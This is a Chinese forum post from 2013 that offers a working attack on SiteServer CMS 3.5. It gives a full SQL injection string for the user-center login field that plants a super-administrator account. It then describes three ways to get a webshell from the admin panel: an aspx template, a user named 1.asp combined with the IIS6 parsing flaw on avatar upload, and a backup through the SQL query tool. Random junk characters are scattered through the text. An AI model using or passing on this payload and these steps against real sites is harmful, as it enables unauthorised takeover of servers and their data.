经测试秒杀最新的3.5版
' O4 X3 x- f0 r$ p Y/ t9 Astieserver官网:www.siteserver.cn' ?0 H) C- k2 F' `
EXP: i6 _ g7 q6 }" L
直接访问UserCenter/login.aspx
, }2 N1 o& c0 P: E+ u+ O1 `用户名处输入:( |% }, E9 \ a* i. z ]2 g0 f* K; c
. R' m" \: n; W$ _ n
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
/ D, \# o" T- T D" l9 V! M3 G密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
! ]1 a! b: [/ L2 X& q) l- A! t" y- z之后再访问后台SiteServer/login.aspx用插入的用户登陆
! w3 ^. e7 I3 Z0 y( W5 I0 J1 L) w) T后台拿webshell的三种方法:) m1 {2 E! L$ V' y
一、
3 T% K$ x t# P6 _4 ?6 W站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
0 y" h5 p d2 L二、4 m( v2 D, m3 S5 Q+ Z( u
成员权限-》添加用户-》用户名为:1.asp
" n8 n5 `+ y2 H W( g& i/ k; K1 C( rhttp://127.0.0.1/usercenter/% s" i# D. {, X; h! {5 t1 `
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
- n) g$ B; k e# I) r( P& D(ps:后台添加用户时不会验证是否含有非法字符)
& a% r s( @5 i# E. j6 d s+ q三、
" I; H) h+ N" K) A7 N# y3 W系统工具-》实用工具-》机器参数查看
. o! L7 c0 x6 C* K! m可以看到数据库类型、名称,WEB路径! q2 Z, w2 n, x, h( M8 a. {
系统工具-》数据库工具-》SQL语句查询
9 n. t8 x/ i9 a( ]3 V7 F这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对